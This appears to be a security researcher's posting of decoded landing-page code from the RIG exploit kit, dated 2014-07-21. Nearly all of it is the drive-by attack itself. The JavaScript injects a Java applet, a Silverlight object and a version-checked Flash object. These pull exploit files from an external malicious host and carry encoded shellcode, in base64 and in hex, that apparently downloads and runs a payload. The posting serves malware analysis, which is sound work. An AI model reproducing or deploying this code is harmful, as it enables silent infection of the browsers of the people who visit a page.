RIG exploit kit decoded exploit code 2014-07-21

1. #####
2. RIG exploit kit landingpage, exploit code 2014-07-21
3. @tehsyntx
4. thembits.blogspot.se
5. #####
6.  
7. /*sad3sdf79dd6fdff*/
8. function dsg45(hgd1) {
9.     var bd6 = window.document.createElement("div");
10.     window.document.body.appendChild(bd6); /*sad9sdf9dd4fdff*/
11.     bd6["innerHTML"] = hgd1;
12. };
13. /*sad2sdf69dd10fdff*/
14. jg67fgf = '<applet><param value="http://welcome.stovepipedinners.com/index.php?req=xml&num=2411&PHPSSESID=njrMNruDMh7HApzBKv7cTKZNKU7YHVnYmMzMhe6JVg|YWUwMzllZTE2OWUyMzVmMzMzYTFmMDc2NmIwNDhlMmY" name="jnlp_href" /><param name="hong" value="http://welcome.stovepipedinners.com/index.php?req=mp3&num=169304&PHPSSESID=njrMNruDMh7HApzBKv7cTKZNKU7YHVnYmMzMhe6JVg%7CYWUwMzllZTE2OWUyMzVmMzMzYTFmMDc2NmIwNDhlMmY"/></applet>';
15. var as5dd = "sdf445h";
16. dsg45(jg67fgf)
17.  
18.  
19. /*sads9d37df2df*/
20. y5gsgew = '<object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="10" height="10"><param name="source" value="http://welcome.stovepipedinners.com/index.php?req=xap&PHPSSESID=njrMNruDMh7HApzBKv7cTKZNKU7YHVnYmMzMhe6JVg|YWUwMzllZTE2OWUyMzVmMzMzYTFmMDc2NmIwNDhlMmY"/><param name="initParams" value="gait=kJCQkOmEAgAAX1oxyVeJ1qwIwHT5Mgc8fA9Ewao8IXXvXonlgexcAQAAieeNTxCNX1QxwFdRUFBQUFBQUFNQUGgEAQAAU1ZQaG9uAABodXJsbVRojk4O7OhHAAAAUOh7AAAA/9CDxAhoT+9PBVDoawAAAP/QhcB1HGpUWfOqaHL+sxboHAAAAFDoUAAAAOibAAAA/9CJ7KwIwHX7iAOAPiF1gcNgMcBki1Awi1IMi1IUi3IouRgAAAAx/zHArDxhfAIsIMHPDQHH4vCB/1u8SmqLQhCLEnXZiUQkHGHDYItsJCSLRTyLVAV4AeqLShiLWiAB6+M0SYs0iwHuMf8xwPyshMB0B8HPDQHH6/Q7fCQodeGLWiQB62aLDEuLWhwB64sEiwHoiUQkHGHCCABgagBqAGoDagBqB2gAAADA/3QkPGilFwB86Fj///9Q6Iz/////0InDUGoAagBqAFBqAmoAagBQaKwI2nboNf///1Doaf///4nF/9CJx//VaFTKr5HoHf///1DoUf///2oEaAAQAABXagD/0InGUIngagBQV1ZTaBZl+hDo9v7//1DoKv/////Q6FIAAABqAGoAagBT/9WJ4GoAUFdWU2gfeQro6M7+//9Q6AL/////0FhoAIAAAGoAVmisMwYD6LP+//9Q6Of+////0Gj7l/0P6KH+//9Q6NX+////0GHDYOgFAAAAbTNTNFZbieWB7AABAACJ4FVWV4nHicYxwKr+wHX7id+9BQAAADHJMduJyDHS9/UCHBeKJA4A44oEHogEDogkHv7BdeUxwDHJMdJdOel9JYnPR4Hn/wAAAIoEPgDCihwWiBw+iAQWANiKBAaLPCQwBA9B69dbXYnsYcPoBgAAAH4xhIwfAOhs/f//FkXw/CVRHvPpcx1e6ekxDUXr+noOWPTpexdf6ultDR/n43JRWOroegYf9ORvQUPh/SITQbeqcQtcubovTAa9uSZNF9TETy1iwd9WOgzq5m0zf/b5WzNZs8ReDkvGx2lJUtDHRTB60btGNmfq1XIzS8nkekh70us6SXLd20oJfP7gcyRlwb5QKWT9wWUoXMn2UgRo0MpyM3XnvlETePPCWxZdyeFGWFXr/CJOA73wPg==" /></object>';
21. var as4d = "sdf445h";
22. dsg45(y5gsgew);
23.  
24. /*sad7sdf63dd4fdff*/
25. function fg346(ax_objects) {
26.     if (typeof window.ActiveXObject != "undefined") {
27.         for (var i = 0; i < ax_objects.length; i++) {
28.             try {
29.                 var nax_obj = new ActiveXObject(ax_objects[i]);
30.                 if (nax_obj) return nax_obj
31.             } catch (exc) {}
32.         }
33.     }
34.     return null
35. }
36.  
37.  function GetFlashVersion() {
38.      var return_version = null;
39.      var flash_obj = fg346(["ShockwaveFlash.ShockwaveFlash"]);
40.      if (flash_obj) {
41.          try {
42.              var flash_version = flash_obj.GetVariable("$" + "version");
43.              flash_version = flash_version.split(" ")[1].split(",");
44.              return_version = flash_version.slice(0, 3).join("");
45.              while (return_version.length < 6) {
46.                  return_version += "0"
47.              }
48.              return [return_version, flash_version[3]]
49.          } catch (exc) {}
50.      }
51.      return null
52.  } /*sada6dsadssdf*/
53.  function yyfd3grr() {
54.      var flash_version = GetFlashVersion();
55.      if (flash_version != null && flash_version[0] >= 110000 && flash_version[0] <= 120000 && (flash_version[0] != 120000 || flash_version[1] < 43)) {
56.          var payload3redfg = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="100" height="100"><param name="movie" value="http://welcome.stovepipedinners.com/index.php?req=swf&num=8159&PHPSSESID=njrMNruDMh7HApzBKv7cTKZNKU7YHVnYmMzMhe6JVg|YWUwMzllZTE2OWUyMzVmMzMzYTFmMDc2NmIwNDhlMmY" /><param name="allowScriptAccess" value="always" /><param name="FlashVars" value="id=90909090e9840200005f5a31c95789d6ac08c074f932073c7c0f44c1aa3c2175ef5e89e581ec5c01000089e78d4f108d5f5431c05751505050505050505350506804010000535650686f6e00006875726c6d54688e4e0eece84700000050e87b000000ffd083c408684fef4f0550e86b000000ffd085c0751c6a5459f3aa6872feb316e81c00000050e850000000e89b000000ffd089ecac08c075fb8803803e217581c36031c0648b50308b520c8b52148b7228b91800000031ff31c0ac3c617c022c20c1cf0d01c7e2f081ff5bbc4a6a8b42108b1275d98944241c61c3608b6c24248b453c8b54057801ea8b4a188b5a2001ebe334498b348b01ee31ff31c0fcac84c07407c1cf0d01c7ebf43b7c242875e18b5a2401eb668b0c4b8b5a1c01eb8b048b01e88944241c61c20800606a006a006a036a006a0768000000c0ff74243c68a517007ce858ffffff50e88cffffffffd089c3506a006a006a00506a026a006a005068ac08da76e835ffffff50e869ffffff89c5ffd089c7ffd56854caaf91e81dffffff50e851ffffff6a046800100000576a00ffd089c65089e06a0050575653681665fa10e8f6feffff50e82affffffffd0e8520000006a006a006a0053ffd589e06a0050575653681f790ae8e8cefeffff50e802ffffffffd05868008000006a005668ac330603e8b3feffff50e8e7feffffffd068fb97fd0fe8a1feffff50e8d5feffffffd061c360e8050000006d335334565b89e581ec0001000089e055565789c789c631c0aafec075fb89dfbd0500000031c931db89c831d2f7f5021c178a240e00e38a041e88040e88241efec175e531c031c931d25d39e97d2589cf4781e7ff0000008a043e00c28a1c16881c3e88041600d88a04068b3c2430040f41ebd75b5d89ec61c3e80600000004331d71c700e86cfdffff6c476901fd2b1c6a14ab675c7014e977477207a2745a6d14a36d5d7314b5771d7e1eaa2b5a7315a27c1d6d19b73b417800fa69432e57a9715e2042f7320b2b57974c634e2282577a594ca96e41503fb571775019f04c726d0b854f452a12934f69533a92336a5527a95d5e500b8a6c562b3b9163162a329e53666a3cbd685f472582367c4a24be49494b1c8a7e7e672893425e5035a4367d7038b04a77751d8a696a6150"/><param name="Play" value="true" /></object>';
57.          dsg45(payload3redfg)
58.      }
59.      return
60.  }
61.  var asd = "sdf445h";
62.  yyfd3grr();